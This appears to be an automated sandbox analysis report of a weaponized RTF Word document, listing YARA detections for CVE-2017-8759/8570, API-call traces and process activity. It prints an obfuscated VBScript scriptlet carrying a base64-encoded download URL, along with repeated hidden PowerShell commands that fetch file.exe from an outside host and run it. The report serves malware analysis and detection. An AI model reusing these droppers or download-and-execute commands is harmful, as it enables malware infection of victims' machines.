Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_004054B6 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: TEPO0015922.doc, type: SAMPLEMatched rule: detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents. Author: ditekSHen
Source: TEPO0015922.doc, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 8Screenshot OCR: Enable Editing to view the document. I t3 I a tE
Source: Screenshot number: 16Screenshot OCR: Enable Editing to view the document. ii: ^ Uf= a S O I @ 100% G) A GE)
Microsoft Office creates scripting files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scTJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scTJump to behavior
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file[1].exeJump to dropped file
Document contains OLE streams with names of living off the land binaries
Source: ~WRF{B63E613D-9211-4CF9-925B-159614833873}.tmp.0.drStream path '_1740622809/\x1Ole10Native' : j....FZdtfhgYgeghD.scT.C:\osdsTggH\FZdtfhgYgeghD.scT..... ...C:\8jkepaD\FZdtfhgYgeghD.scT...<scriptleT.. ><script runat="server" language = 'vbscript'>....fsdfdsfs = "aHR0UHM6Ly90aGVrYXJpYmFjcnVpc2Vjb21wYW55LmNvbS9maWxlLmV4ZQ==" 'wiiurg..yulkytjtrhtjrkdsarjky ="ZmlsZS5leGU=" 'wiiurg..Function age64Funccode(ByVal cvwtr5ycbve, ByVal trtsk484t378).. Dim xtexenc.. if trtsk484t378 Then xtexenc = "utf-16le" Else xtexenc = "utf" + "-8".. ' Use an aux. XML document with a Base64-encoded element... ' Assigning the encoded text to .Text makes the decoded byte array.. jdcuidowfubg7 = "b" + "je".. vbsxjkhwgejkdwfgkvbf = "Cr".. vbsxjkhwgejkdwfgkvbf = vbsxjkhwgejkdwfgkvbf + "eateO".. vbsxjkhwgejkdwfgkvbf = vbsxjkhwgejkdwfgkvbf + jdcuidowfubg7 + "ct".. soswjwslvc = "reate".. mosdoepfy9eqje = "Se".. vposaleusaogr = "(""Msx".. vposaleusaogr = vposaleusaogr + "ml2.".. vposaleusaogr = vposaleusaogr + "DOMDocument"")" + ".C".. mosdoepfy9eqje = mosdoepfy9eqje + "t alxmd = " + vbsxjkhwgejkdwfgkvbf + vposaleusaogr + soswjwslvc + "E".. mosdoepfy9eqje = mosdoepfy9eqje + "l".. mosdoepfy9eqje = mosdoepfy9eqje + "em".. mosdoepfy9eqje = mosdoepfy9eqje + "ent(".. mosdoepfy9eqje = mosdoepfy9eqje + """a".. mosdoepfy9eqje = mosdoepfy9eqje + "ux"")".. 'MsgBox(mosdoepfy9eqje).. var1 = mosdoepfy9eqje...sn556 = "ex" + "ecu"...sn556 = sn556 + "te" + "(var1)".. dim uify7eiwhjdvhig3y893ry:EvaFunc sn556.. ksvjvwdwye2r = "Data".. odjeiojfyd2f8fu34u = "alxmd." + ksvjvwdwye2r + "Type = wslausfychks".. var1 = odjeiojfyd2f8fu34u.... sn556 = "ex" + "ecu" + "te" + "(var1)".. dim a32947234987234:EvaFunc(sn556)....'MsgBox(aaaaaaaadddd).. vartyzx = "md".. vartx = ".Tex"...rey45r3t3e3yhju = "alx" + vartyzx + vartx + "t = ".. rey45r3t3e3yhju = rey45r3t3e3yhju + "cvwtr5ycbve".. buicd78 = "alxmd.Text = cvwtr5ycbve".... var1 = buicd78.. sn556 = "ex" + "ecu" + "te" + "(var1)".. dim a32947234987236:execute sn556.... age64Funccode = BytesToStr(alxmd.NodeTypedValue, xtexenc)..End Function....apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 01007840626
Source: ~WRF{B63E613D-9211-4CF9-925B-159614833873}.tmp.0.drStream path '_1740622893/\x1Ole10Native' : k....FZdtfhgYgeghD.scT.C:\osdsTggH\FZdtfhgYgeghD.scT.....6...C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD.scT.j..<scriptleT.. ><script runat="server" language = 'vbscript'>....fsdfdsfs = "aHR0UHM6Ly90aGVrYXJpYmFjcnVpc2Vjb21wYW55LmNvbS9maWxlLmV4ZQ==" 'wiiurg..yulkytjtrhtjrkdsarjky ="ZmlsZS5leGU=" 'wiiurg..Function age64Funccode(ByVal cvwtr5ycbve, ByVal trtsk484t378).. Dim xtexenc.. if trtsk484t378 Then xtexenc = "utf-16le" Else xtexenc = "utf" + "-8".. ' Use an aux. XML document with a Base64-encoded element... ' Assigning the encoded text to .Text makes the decoded byte array.. jdcuidowfubg7 = "b" + "je".. vbsxjkhwgejkdwfgkvbf = "Cr".. vbsxjkhwgejkdwfgkvbf = vbsxjkhwgejkdwfgkvbf + "eateO".. vbsxjkhwgejkdwfgkvbf = vbsxjkhwgejkdwfgkvbf + jdcuidowfubg7 + "ct".. soswjwslvc = "reate".. mosdoepfy9eqje = "Se".. vposaleusaogr = "(""Msx".. vposaleusaogr = vposaleusaogr + "ml2.".. vposaleusaogr = vposaleusaogr + "DOMDocument"")" + ".C".. mosdoepfy9eqje = mosdoepfy9eqje + "t alxmd = " + vbsxjkhwgejkdwfgkvbf + vposaleusaogr + soswjwslvc + "E".. mosdoepfy9eqje = mosdoepfy9eqje + "l".. mosdoepfy9eqje = mosdoepfy9eqje + "em".. mosdoepfy9eqje = mosdoepfy9eqje + "ent(".. mosdoepfy9eqje = mosdoepfy9eqje + """a".. mosdoepfy9eqje = mosdoepfy9eqje + "ux"")".. 'MsgBox(mosdoepfy9eqje).. var1 = mosdoepfy9eqje...sn556 = "ex" + "ecu"...sn556 = sn556 + "te" + "(var1)".. dim uify7eiwhjdvhig3y893ry:EvaFunc sn556.. ksvjvwdwye2r = "Data".. odjeiojfyd2f8fu34u = "alxmd." + ksvjvwdwye2r + "Type = wslausfychks".. var1 = odjeiojfyd2f8fu34u.... sn556 = "ex" + "ecu" + "te" + "(var1)".. dim a32947234987234:EvaFunc(sn556)....'MsgBox(aaaaaaaadddd).. vartyzx = "md".. vartx = ".Tex"...rey45r3t3e3yhju = "alx" + vartyzx + vartx + "t = ".. rey45r3t3e3yhju = rey45r3t3e3yhju + "cvwtr5ycbve".. buicd78 = "alxmd.Text = cvwtr5ycbve".... var1 = buicd78.. sn556 = "ex" + "ecu" + "te" + "(var1)".. dim a32947234987236:execute sn556.... age64Funccode = BytesToStr(alxmd.NodeTypedValue, xtexenc)..End Function....apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "0100784062605620861036505630846
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\file.exeJump to dropped file
Source: TEPO0015922.doc, type: SAMPLEMatched rule: SUSP_INDICATOR_RTF_MalVer_Objects date = 2022-10-20, hash2 = a31da6c6a8a340901f764586a28bd5f11f6d2a60a38bf60acd844c906a0d44b1, author = ditekSHen, description = Detects RTF documents with non-standard version and embedding one of the object mostly observed in exploit (e.g. CVE-2017-11882) documents., score = 43812ca7f583e40b3e3e92ae90a7e935c87108fa863702aa9623c6b7dc3697a2, reference = https://github.com/ditekshen/detection
Source: TEPO0015922.doc, type: SAMPLEMatched rule: INDICATOR_RTF_Exploit_Scripting author = ditekSHen, description = detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents.
Source: TEPO0015922.doc, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: 0000000C.00000002.925602681.000000000016E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 0000000C.00000002.925602681.000000000016E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth (Nextron Systems), description = Detects PowerShell invocation with suspicious parameters, score = , reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: 00000006.00000002.912243758.0000000001CF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000006.00000002.911999906.0000000000200000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000006.00000002.911999906.0000000000200000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth (Nextron Systems), description = Detects PowerShell invocation with suspicious parameters, score = , reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: 00000012.00000002.953185169.0000000000280000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000012.00000002.953185169.0000000000280000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth (Nextron Systems), description = Detects PowerShell invocation with suspicious parameters, score = , reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: 00000012.00000002.955614868.0000000001BD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 0000000C.00000002.926137443.0000000001B46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 0000000C.00000002.925602681.0000000000130000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 0000000C.00000002.925602681.0000000000130000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth (Nextron Systems), description = Detects PowerShell invocation with suspicious parameters, score = , reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: 00000006.00000002.911999906.000000000023E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000006.00000002.911999906.000000000023E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth (Nextron Systems), description = Detects PowerShell invocation with suspicious parameters, score = , reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: 00000012.00000002.953185169.00000000002BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000012.00000002.953185169.00000000002BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth (Nextron Systems), description = Detects PowerShell invocation with suspicious parameters, score = , reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: 0000000C.00000002.925602681.00000000001F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000012.00000002.953185169.00000000002CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: Process Memory Space: powershell.exe PID: 1568, type: MEMORYSTRMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: Process Memory Space: powershell.exe PID: 1832, type: MEMORYSTRMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: C:\Users\user\AppData\Roaming\file.exe, type: DROPPEDMatched rule: SUSP_NullSoftInst_Combo_Oct20_1 date = 2020-10-06, hash3 = a9ca1d6a981ccc8d8b144f337c259891a67eb6b85ee41b03699baacf4aae9a78, hash2 = 93951379e57e4f159bb62fd7dd563d1ac2f3f23c80ba89f2da2e395b8a647dcf, author = Florian Roth (Nextron Systems), description = Detects suspicious NullSoft Installer combination with common Copyright strings, score = 686b5240e5e503528cc5ac8d764883413a260716dd290f114a60af873ee6a65f, reference = https://twitter.com/malwrhunterteam/status/1313023627177193472
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file[1].exe, type: DROPPEDMatched rule: SUSP_NullSoftInst_Combo_Oct20_1 date = 2020-10-06, hash3 = a9ca1d6a981ccc8d8b144f337c259891a67eb6b85ee41b03699baacf4aae9a78, hash2 = 93951379e57e4f159bb62fd7dd563d1ac2f3f23c80ba89f2da2e395b8a647dcf, author = Florian Roth (Nextron Systems), description = Detects suspicious NullSoft Installer combination with common Copyright strings, score = 686b5240e5e503528cc5ac8d764883413a260716dd290f114a60af873ee6a65f, reference = https://twitter.com/malwrhunterteam/status/1313023627177193472
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 16_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_0040727F
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_00406AA8
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_73C22288
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 16_2_0040727F
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 16_2_00406AA8
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 16_2_73C32288
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 21_2_73BC2288
Source: C:\Users\user\AppData\Roaming\file.exeCode function: String function: 00402C39 appears 52 times
Source: ~WRF{B63E613D-9211-4CF9-925B-159614833873}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Users\user\AppData\Roaming\file.exeProcess Stats: CPU usage > 98%
Source: libgdk_pixbuf-2.0-0.dll.9.drStatic PE information: Number of sections : 12 > 10
Source: C:\Users\user\AppData\Roaming\file.exeMemory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\file.exeMemory allocated: 77740000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\file.exeMemory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\file.exeMemory allocated: 77740000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\file.exeMemory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\file.exeMemory allocated: 77740000 page execute and read and write
Source: TEPO0015922.docReversingLabs: Detection: 23%
Source: TEPO0015922.docVirustotal: Detection: 42%
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..,.............p.......#.........-.......j.....p.........j.......e.....`Ig.......bw.....................Kn.......,.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................B......#....................... ...............................................................H$G.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...........0.!..............#G.....6.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.................ek....................................}.dw....@.......0.!.............H$G.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7...............}.dw....P.......0.!..............#G.....".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.................ek....................................}.dw............0.!.............H$G.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..,.............y=.w....G.................ek.....&G.............................}.dw....P.......0.!...............,.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G.................ek....................................}.dw............0.!.............H$G.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..,.............y=.w....S.................ek.....&G.............................}.dw............0.!...............,.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S.................ek....................................}.dw....(.......0.!.............H$G.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..,.............0.!....._.........................T..... .......................}.dw............ .................,.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.................ek....................................}.dw.... .......0.!.............H$G.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..,.............y=.w....k.................ek.....&G.............................}.dw....X.......0.!...............,.....f.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k.................ek....................................}.dw............0.!.............H$G.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.......w....... .........ek.....&G.............................}.dw.... .......0.!..............#G.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w.................ek....................................}.dw....X.......0.!.............H$G.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................p.......#.................r.....p.........r.......m.....`Io.......bw.....................Kv.....................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................B......#....................... ................................................................!..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...........0................!......6.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../..................k....................................}.dw............0................!..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7...............}.dw.... .......0................!......".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;..................k....................................}.dw....X.......0................!..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............B..k....`$..............................}.dw.... .......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G..................k....................................}.dw....X.......0................!..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............B..k....`$..............................}.dw............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S..................k....x...............................}.dw............0................!..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................0......._.......................x....... .......................}.dw............ ...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._..................k....p...............................}.dw............0................!..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............B..k....`$..............................}.dw....(.......0.......................f.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k..................k....................................}.dw....`.......0................!..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.~.....w....... .......B..k....`$..............................}.dw............0................!..............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w..................k....................................}.dw....(.......0................!..............................
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\file.exe C:\Users\user\AppData\Roaming\file.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\file.exe C:\Users\user\AppData\Roaming\file.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\file.exe C:\Users\user\AppData\Roaming\file.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
